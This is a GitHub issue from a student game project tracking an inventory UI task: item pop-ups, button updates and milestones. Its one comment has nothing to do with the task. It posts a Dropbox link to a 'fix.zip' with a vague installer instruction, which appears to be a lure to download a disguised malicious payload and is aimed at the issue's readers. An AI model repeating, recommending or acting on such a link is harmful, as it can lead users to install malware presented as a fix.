### ISSUE TITLE
Updated Inventory UI

### ISSUE THREAD

**Issue by tompreston1** [UQcsse3200/2024-studio-2#121]
# **Updated Inventory UI**
**Task:** [Updated Inventory UI].
**Feature:** [Inventory/items](#3)

This task is for implementing and updating features on the inventory and item user interface. For example the inventory buttons need to be updated and inventory item pop up descriptions need to be implemented.

# **Milestones**
List of steps that need to be completed for this task.
- [x] Have pop up implemented (Aug. 26)
- [x] Have Item pop up dispose when item clicked (Aug 28)
- [ ] Main pull request (Aug. 28)

**Completion Deadline:** Aug. 28

# **Documentation**
- [Main description of feature](../wiki/Game-Screens)
- [JavaDoc](JavaDoc/Location/Package/Class)
- ...
 
# **Member**
- Tom (@tompreston1) `tom152738379`

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
